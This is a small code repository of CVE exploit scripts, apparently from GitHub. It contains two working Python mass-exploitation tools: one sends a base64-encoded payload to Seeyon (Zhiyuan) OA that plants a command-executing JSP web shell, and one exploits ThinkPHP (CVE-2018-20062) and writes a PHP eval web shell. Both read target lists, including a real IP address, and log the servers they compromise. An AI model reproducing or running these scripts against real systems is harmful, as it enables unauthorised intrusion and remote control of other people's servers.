├── README.md
├── CVE-2018-20062
    ├── url.txt
    ├── README.md
    └── untitled.py
└── 致远OA
    ├── README.md
    └── zhiyuan.py


/README.md:
--------------------------------------------------------------------------------
1 | # CVE利用脚本
2 | 


--------------------------------------------------------------------------------
/CVE-2018-20062/url.txt:
--------------------------------------------------------------------------------
1 | http://103.61.240.169
2 | 


--------------------------------------------------------------------------------
/CVE-2018-20062/README.md:
--------------------------------------------------------------------------------
1 | 
2 | 批量检测url，url.txt
3 | 


--------------------------------------------------------------------------------
/致远OA/README.md:
--------------------------------------------------------------------------------
1 | 批量检测url</br>
2 | 
3 | 在脚本同目录下建立url.txt</br>
4 | 
5 | 放入待检测的URL</br>
6 | 
7 | 运行脚本</br>
8 | 


--------------------------------------------------------------------------------
/致远OA/zhiyuan.py:
--------------------------------------------------------------------------------
 1 | # Wednesday, 26 June 2019
 2 | # Author:nianhua
 3 | # Blog:https://github.com/nian-hua/
 4 | 
 5 | import re
 6 | import requests
 7 | import base64
 8 | from multiprocessing import Pool, Manager
 9 | 
10 | def send_payload(url):
11 | 
12 |     headers = {'Content-Type': 'application/x-www-form-urlencoded'}
13 | 
14 |     payload = "REJTVEVQIFYzLjAgICAgIDM1NSAgICAgICAgICAgICAwICAgICAgICAgICAgICAgNjY2ICAgICAgICAgICAgIERCU1RFUD1PS01MbEtsVg0KT1BUSU9OPVMzV1lPU1dMQlNHcg0KY3VycmVudFVzZXJJZD16VUNUd2lnc3ppQ0FQTGVzdzRnc3c0b0V3VjY2DQpDUkVBVEVEQVRFPXdVZ2hQQjNzekIzWHdnNjYNClJFQ09SRElEPXFMU0d3NFNYekxlR3c0VjN3VXczelVvWHdpZDYNCm9yaWdpbmFsRmlsZUlkPXdWNjYNCm9yaWdpbmFsQ3JlYXRlRGF0ZT13VWdoUEIzc3pCM1h3ZzY2DQpGSUxFTkFNRT1xZlRkcWZUZHFmVGRWYXhKZUFKUUJSbDNkRXhReVlPZE5BbGZlYXhzZEdoaXlZbFRjQVRkTjFsaU40S1h3aVZHemZUMmRFZzYNCm5lZWRSZWFkRmlsZT15UldaZEFTNg0Kb3JpZ2luYWxDcmVhdGVEYXRlPXdMU0dQNG9FekxLQXo0PWl6PTY2DQo8JUAgcGFnZSBsYW5ndWFnZT0iamF2YSIgaW1wb3J0PSJqYXZhLnV0aWwuKixqYXZhLmlvLioiIHBhZ2VFbmNvZGluZz0iVVRGLTgiJT48JSFwdWJsaWMgc3RhdGljIFN0cmluZyBleGN1dGVDbWQoU3RyaW5nIGMpIHtTdHJpbmdCdWlsZGVyIGxpbmUgPSBuZXcgU3RyaW5nQnVpbGRlcigpO3RyeSB7UHJvY2VzcyBwcm8gPSBSdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKGMpO0J1ZmZlcmVkUmVhZGVyIGJ1ZiA9IG5ldyBCdWZmZXJlZFJlYWRlcihuZXcgSW5wdXRTdHJlYW1SZWFkZXIocHJvLmdldElucHV0U3RyZWFtKCkpKTtTdHJpbmcgdGVtcCA9IG51bGw7d2hpbGUgKCh0ZW1wID0gYnVmLnJlYWRMaW5lKCkpICE9IG51bGwpIHtsaW5lLmFwcGVuZCh0ZW1wKyJcbiIpO31idWYuY2xvc2UoKTt9IGNhdGNoIChFeGNlcHRpb24gZSkge2xpbmUuYXBwZW5kKGUuZ2V0TWVzc2FnZSgpKTt9cmV0dXJuIGxpbmUudG9TdHJpbmcoKTt9ICU+PCVpZigiYXNhc2QzMzQ0NSIuZXF1YWxzKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJwd2QiKSkmJiEiIi5lcXVhbHMocmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpKSl7b3V0LnByaW50bG4oIjxwcmU+IitleGN1dGVDbWQocmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpKSArICI8L3ByZT4iKTt9ZWxzZXtvdXQucHJpbnRsbigiOi0pIik7fSU+NmU0ZjA0NWQ0Yjg1MDZiZjQ5MmFkYTdlMzM5MGQ3Y2U="
15 | 
16 |     payload = base64.b64decode(payload)
17 | 
18 |     try:
19 | 
20 |         r = requests.post(url + '/seeyon/htmlofficeservlet', data=payload)
21 | 
22 |         r = requests.get(
23 |             url + '/seeyon/test123456.jsp?pwd=asasd3344&cmd=cmd%20+/c+echo+wangming')
24 | 
25 |         if "wangming" in r.text:
26 | 
27 |             return url
28 | 
29 |         else:
30 | 
31 |             return 0
32 | 
33 |     except:
34 | 
35 |         return 0
36 | 
37 | def remove_control_chars(s):
38 |     control_chars = ''.join(map(unichr, range(0,32) + range(127,160)))
39 |     
40 |     control_char_re = re.compile('[%s]' % re.escape(control_chars))
41 | 
42 |     s = control_char_re.sub('', s)
43 | 
44 |     if 'http' not in s:
45 | 
46 |         s = 'http://' + s
47 | 
48 |     return s
49 | 
50 | def savePeopleInformation(url, queue):
51 | 
52 |     newurl = send_payload(url)
53 | 
54 |     if newurl != 0:
55 | 
56 |         fw = open('loophole.txt', 'a')
57 |         fw.write(newurl + '\n')
58 |         fw.close()
59 | 
60 |     queue.put(url)
61 | 
62 | def main():
63 | 
64 |     pool = Pool(10)
65 | 
66 |     queue = Manager().Queue()
67 | 
68 |     fr = open('url.txt', 'r')
69 | 
70 |     lines = fr.readlines()
71 | 
72 |     for i in lines:
73 | 
74 |         url = remove_control_chars(i)
75 | 
76 |         pool.apply_async(savePeopleInformation, args=(url, queue,))
77 | 
78 |     allnum = len(lines)
79 | 
80 |     num = 0
81 | 
82 |     while True:
83 | 
84 |         print queue.get()
85 | 
86 |         num += 1
87 | 
88 |         if num >= allnum:
89 | 
90 |             fr.close()
91 | 
92 |             break
93 | 
94 | if "__main__" == __name__:
95 | 
96 |     main()
97 | 


--------------------------------------------------------------------------------
/CVE-2018-20062/untitled.py:
--------------------------------------------------------------------------------
  1 | # Tuesday, December 11, 2018
  2 | # Author:nianhua
  3 | # Blog:https://github.com/nian-hua/
  4 | 
  5 | import re
  6 | import requests
  7 | from multiprocessing import Pool, Manager
  8 | 
  9 | payload = ['/?s=index/\\think\\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1',
 10 |            '/?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1',
 11 |            '/?s=index/\\think\\Request/input&filter=phpinfo&data=1',
 12 |            '/public/?s=index/\\think\\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1',
 13 |            '/public/?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1',
 14 |            '/public/?s=index/\\think\\Request/input&filter=phpinfo&data=1',
 15 |            '?s=index/\\think\\view\\driver\\Php/display&content=<?php phpinfo();?>',
 16 |            '/public/?s=index/\\think\\view\\driver\\Php/display&content=<?php phpinfo();?>',
 17 |            ]
 18 | 
 19 | proxies = {
 20 |   "http": "http://127.0.0.1:8080",
 21 |   "https": "http://127.0.0.1:8080",
 22 | }
 23 | 
 24 | getshell = '/?s=index/\\think\\template\\driver\\file/write&cacheFile=7a57a5a743894a0e.php&content=%3C?php%20%40eval($_GET["cmd"]);?%3E'
 25 | 
 26 | headers = {
 27 |     "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36"}
 28 | 
 29 | 
 30 | def remove_control_chars(s):
 31 |     control_chars = ''.join(map(unichr, range(0,32) + range(127,160)))
 32 |     
 33 |     control_char_re = re.compile('[%s]' % re.escape(control_chars))
 34 | 
 35 |     s = control_char_re.sub('', s)
 36 | 
 37 |     if 'http' not in s:
 38 | 
 39 |         s = 'http://' + s
 40 | 
 41 |     return s
 42 | 
 43 | def ThinkPHP(url):
 44 | 
 45 |     try:
 46 | 
 47 |         for i in payload:
 48 | 
 49 |             newurl = url + i
 50 | 
 51 |             r = requests.get(newurl,headers=headers)
 52 | 
 53 |             if "PHP Version" in r.text:
 54 | 
 55 |                 r = requests.get(url + getshell,headers=headers)
 56 | 
 57 |                 if r.status_code == 200:
 58 | 
 59 |                     shellurl = url + '/7a57a5a743894a0e.php'
 60 | 
 61 |                     return newurl, shellurl
 62 | 
 63 |                 return newurl, 0
 64 | 
 65 |     except:
 66 | 
 67 |         pass
 68 | 
 69 |     return 0, 0
 70 | 
 71 | 
 72 | def savePeopleInformation(url, queue):
 73 | 
 74 |     newurl, shellurl = ThinkPHP(url)
 75 | 
 76 |     if newurl != 0:
 77 | 
 78 |         fw = open('loophole.txt', 'a')
 79 |         fw.write(newurl + '\n')
 80 |         fw.close()
 81 | 
 82 |         if shellurl != 0:
 83 | 
 84 |             fw = open('shell.txt', 'a')
 85 |             fw.write(shellurl + '\n')
 86 |             fw.close()
 87 | 
 88 |     queue.put(url)
 89 | 
 90 | 
 91 | def main():
 92 | 
 93 |     pool = Pool(10)
 94 | 
 95 |     queue = Manager().Queue()
 96 | 
 97 |     fr = open('url.txt', 'r')
 98 | 
 99 |     lines = fr.readlines()
100 | 
101 |     for i in lines:
102 | 
103 |         url = remove_control_chars(i)
104 | 
105 |         pool.apply_async(savePeopleInformation, args=(url, queue,))
106 | 
107 |     allnum = len(lines)
108 | 
109 |     num = 0
110 | 
111 |     while True:
112 | 
113 |         print queue.get()
114 | 
115 |         num += 1
116 | 
117 |         if num >= allnum:
118 | 
119 |             fr.close()
120 | 
121 |             break
122 | 
123 | 
124 | 
125 | 
126 | if "__main__" == __name__:
127 | 
128 |     main()
129 | 


--------------------------------------------------------------------------------